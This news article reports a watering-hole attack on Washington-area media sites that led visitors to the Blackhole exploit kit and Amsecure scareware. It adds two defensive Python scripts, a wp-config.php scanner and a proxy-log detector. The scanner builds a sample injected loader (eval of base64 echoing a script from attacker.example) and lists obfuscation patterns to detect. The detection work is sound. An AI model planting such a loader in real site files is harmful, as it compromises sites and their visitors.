Websites belonging to a number of Washington, D.C.-area media outlets have been compromised in a series of opportunistic attacks, with criminals using a watering-hole tactic to spread scareware, or phony antivirus software.
Popular D.C. radio station WTOP, sister station Federal News Radio, and the site of technology blogger John Dvorak were injected with code that redirects site visitors to an exploit kit targeting third-party Java and Adobe browser plug-ins. The kit serves a scareware executable known as Amsecure.
As of Tuesday morning, WTOP was still serving malware. The source of the attacks on WTOP and Federal News Radio has not been determined, and it is still possible that they are a jumping-off point for a larger attack against federal employees who frequent those sites as a D.C. news source. Media sites have been targeted more frequently in recent months, and at a variety of levels. For now, though, experts are not calling these targeted attacks.
“Typically with ‘watering hole’ style attacks, the threat actors are targeting a very specific group of users or organizations in order to implant malware (remote access Trojan) that allows for access to the victim’s network (as we saw with the recent DoL compromise),” said Invincea in a statement provided to Threatpost. “In the case of these three sites which are obviously visited by a much larger audience and based on the type of malware observed (crimeware vs. RAT) our assumption is that a specific user group is more than likely not being targeted. Theft of online credentials and/or loss of additional PII is the likely goal of the attacker in these cases.”
Zscaler, meanwhile, said the three attacks shared another commonality: the attack sites were hosted at dynamic DNS providers, and the attack is triggered only when the visitor's browser is detected as Internet Explorer. Zscaler also identified three other media sites as compromised: The Christian Post, Real Clear Science and Real Clear Policy.
The Dvorak site, meanwhile, may offer more clues about the attack than the other two. Invincea said it visited the site using Internet Explorer with the Java, Adobe Reader and Flash plug-ins loaded and was attacked immediately. An admin for the Dvorak site posted a note that malware had been discovered in the site's wp-config.php file, the main configuration file for the WordPress content management system.
“Given the amount of attention WordPress has received both recently and historically by miscreants seeking to hijack legitimate websites in order to drive user traffic to malware landing pages, this came as no surprise to us,” Invincea security engineer Eddie Mitchell said.
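A site owner who suspects this kind of hijack usually wants two checks on wp-config.php: whether the file still matches a known-good copy, and whether it now contains the loader patterns (eval of a base64 blob, obfuscation decoders, code appended after the wp-settings.php include) that injected WordPress configs typically carry. The script below is an added example written for this page, not code from Invincea or the Dvorak site; the two config contents, the sample payload and the pattern list are constructed for illustration.

```python
import base64
import hashlib
import re

# Constructed sample wp-config.php contents (not real site files).
CLEAN_CONFIG = """<?php
define('DB_NAME', 'wp');
define('DB_USER', 'wp');
define('DB_PASSWORD', 'secret');
define('DB_HOST', 'localhost');
$table_prefix = 'wp_';
require_once(ABSPATH . 'wp-settings.php');
"""

# Hypothetical injected loader appended after the settings include: a
# base64-wrapped echo of a script tag pointing at an attacker-controlled host.
PAYLOAD = base64.b64encode(
    b'echo "<script src=http://attacker.example/a.js></script>";'
).decode()
INJECTED_CONFIG = CLEAN_CONFIG + f"eval(base64_decode('{PAYLOAD}'));\n"

# Heuristic patterns common in injected PHP loaders (an example list, not exhaustive).
SUSPICIOUS_PATTERNS = [
    (re.compile(r"\beval\s*\("), "eval("),
    (re.compile(r"\bbase64_decode\s*\("), "base64_decode("),
    (re.compile(r"\b(gzinflate|gzuncompress|str_rot13)\s*\("), "obfuscation decoder"),
    (re.compile(r"\b(assert|create_function)\s*\("), "dynamic code execution"),
    (re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/[a-z]*e[a-z]*['\"]"), "preg_replace /e"),
    (re.compile(r"\b(include|require)(_once)?\s*\(?\s*['\"]https?://"), "remote include"),
    (re.compile(r"[A-Za-z0-9+/]{60,}={0,2}"), "long base64-looking blob"),
]


def suspicious_lines(php_source):
    """Return (line number, reasons, stripped line) for every suspicious line."""
    findings = []
    after_settings_include = False
    for lineno, line in enumerate(php_source.splitlines(), 1):
        stripped = line.strip()
        reasons = [label for rx, label in SUSPICIOUS_PATTERNS if rx.search(line)]
        # wp-config.php normally ends with the wp-settings.php include; any code
        # after it is unusual and worth a look (a heuristic, not a hard rule).
        is_comment = stripped.startswith(("//", "#", "/*", "*"))
        if after_settings_include and stripped and stripped != "?>" and not is_comment:
            reasons.append("code after wp-settings.php include")
        if "wp-settings.php" in line:
            after_settings_include = True
        if reasons:
            findings.append((lineno, reasons, stripped))
    return findings


def baseline_digest(php_source):
    """SHA-256 of the file contents, to be recorded when the site is known clean."""
    return hashlib.sha256(php_source.encode()).hexdigest()


def check_config(php_source, known_good_digest):
    """Combine the integrity check with the pattern scan into one verdict."""
    modified = baseline_digest(php_source) != known_good_digest
    findings = suspicious_lines(php_source)
    if findings:
        verdict = "suspicious"
    elif modified:
        verdict = "modified"  # changed since baseline but no known loader pattern
    else:
        verdict = "clean"
    return {"modified": modified, "findings": findings, "verdict": verdict}


if __name__ == "__main__":
    good = baseline_digest(CLEAN_CONFIG)
    for name, cfg in (("clean", CLEAN_CONFIG), ("injected", INJECTED_CONFIG)):
        result = check_config(cfg, good)
        print(name, result["verdict"])
        for lineno, reasons, text in result["findings"]:
            print(f"  line {lineno}: {', '.join(reasons)}: {text[:60]}")
```

The digest comparison catches any change, including ones the pattern list misses, while the pattern scan explains what changed; in practice the baseline hash should be stored off the web host, since an attacker with write access to wp-config.php can also overwrite a hash kept beside it.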
Upon landing on the Dvorak site, IE pulls a Java application from the attacker's site and connects to one of two malicious domains, both with Russian registrations. The Amsecure malware is then downloaded and a desktop shortcut named Internet Security 2013.lnk (a Windows shortcut file) is installed.
Amsecure is part of the Kazy malware family. Previous variants take over the desktop and display a warning that the computer is infected, along with a phony scanner tool the attacker hopes will scare the user into buying the fake antivirus program.
Invincea also found three exploits on the Dvorak landing page, one for Java and two for Adobe Reader: CVE-2013-0422 (Java), CVE-2009-0927 and CVE-2010-0188 (Reader). These lead to a landing page hosting the Black Hole exploit kit and the Amsecure payload.
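The chain described above (an Internet Explorer visitor is redirected from the compromised site to a dynamic-DNS host, which serves a Java archive or PDF carrying the exploit, after which the scareware executable is fetched) is something a web proxy log can show end to end. The script below is an added example written for this page, not Zscaler's or Invincea's detection logic; the tab-separated log lines, the media-site.example and example-dyn.org names, the window size and the content-type lists are all constructed placeholders, and a real deployment would substitute the actual dynamic DNS provider zones and the compromised outlets' domains.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Constructed proxy log (tab-separated: time, client, URL, status, content type,
# referer, user agent). Hosts and addresses are placeholders, not real observations.
LOG_LINES = """\
2013-05-07T09:00:01\t10.1.2.3\thttp://media-site.example/\t200\ttext/html\t-\tMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
2013-05-07T09:00:02\t10.1.2.3\thttp://stats.example-dyn.org/counter.php\t200\ttext/html\thttp://media-site.example/\tMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
2013-05-07T09:00:03\t10.1.2.3\thttp://stats.example-dyn.org/load.jar\t200\tapplication/java-archive\thttp://stats.example-dyn.org/counter.php\tMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
2013-05-07T09:00:05\t10.1.2.3\thttp://stats.example-dyn.org/setup.exe\t200\tapplication/x-msdownload\t-\tJava/1.7.0_10
2013-05-07T09:01:00\t10.1.2.4\thttp://media-site.example/\t200\ttext/html\t-\tMozilla/5.0 (X11; Linux x86_64) Firefox/20.0
2013-05-07T09:01:01\t10.1.2.4\thttp://stats.example-dyn.org/counter.php\t200\ttext/html\thttp://media-site.example/\tMozilla/5.0 (X11; Linux x86_64) Firefox/20.0
2013-05-07T09:30:00\t10.1.2.5\thttp://cdn.example-dyn.org/logo.png\t200\timage/png\thttp://other.example/\tMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
"""

DYNAMIC_DNS_SUFFIXES = ("example-dyn.org",)   # placeholder for real DDNS provider zones
WATCHED_SITES = ("media-site.example",)       # placeholder for the compromised outlets
EXPLOIT_CARRIER_TYPES = ("application/java-archive", "application/pdf",
                         "application/x-shockwave-flash")
EXECUTABLE_TYPES = ("application/x-msdownload", "application/octet-stream")


def host_of(url):
    return urlparse(url).hostname or ""


def under(host, suffixes):
    return any(host == s or host.endswith("." + s) for s in suffixes)


def is_ie(user_agent):
    return "MSIE" in user_agent or "Trident/" in user_agent


def parse_log(text):
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, url, status, ctype, referer, ua = line.split("\t")
        records.append({"time": datetime.fromisoformat(ts), "client": client, "url": url,
                        "status": status, "ctype": ctype, "referer": referer, "ua": ua})
    return records


def detect(text, window_seconds=300):
    """Track each client through the redirect chain and report the stage reached.

    stage 1: request to a dynamic-DNS host with a watched site as referer
    stage 2: exploit-carrying content type fetched from that same host
    stage 3: executable download following the exploit fetch
    """
    by_client = defaultdict(list)
    for rec in parse_log(text):
        by_client[rec["client"]].append(rec)
    results = []
    for client, recs in by_client.items():
        recs.sort(key=lambda r: r["time"])
        state = None
        for r in recs:
            host = host_of(r["url"])
            if state is None:
                if under(host, DYNAMIC_DNS_SUFFIXES) and under(host_of(r["referer"]), WATCHED_SITES):
                    state = {"client": client, "landing_host": host, "stage": 1,
                             "ie": is_ie(r["ua"]), "started": r["time"], "evidence": [r["url"]]}
                continue
            if r["time"] - state["started"] > timedelta(seconds=window_seconds):
                break  # later requests fall outside the correlation window
            if state["stage"] == 1 and host == state["landing_host"] and r["ctype"] in EXPLOIT_CARRIER_TYPES:
                state["stage"] = 2
                state["evidence"].append(r["url"])
            elif state["stage"] == 2 and (r["ctype"] in EXECUTABLE_TYPES or r["url"].lower().endswith(".exe")):
                state["stage"] = 3
                state["evidence"].append(r["url"])
        if state:
            results.append(state)
    return results


def alerts(text):
    """Only clients that fetched exploit content (stage 2 or later) become alerts."""
    return [s for s in detect(text) if s["stage"] >= 2]


if __name__ == "__main__":
    for s in detect(LOG_LINES):
        print(s["client"], "stage", s["stage"], "IE" if s["ie"] else "non-IE", s["evidence"])
```

The non-IE client reaches only stage 1 (the landing page answered with plain HTML and nothing followed), which matches the IE-only triggering Zscaler described, and the client pulling an image from a dynamic-DNS host with an unrelated referer never enters the chain at all; keeping the referer condition is what stops ordinary dynamic-DNS traffic from flooding the alert queue.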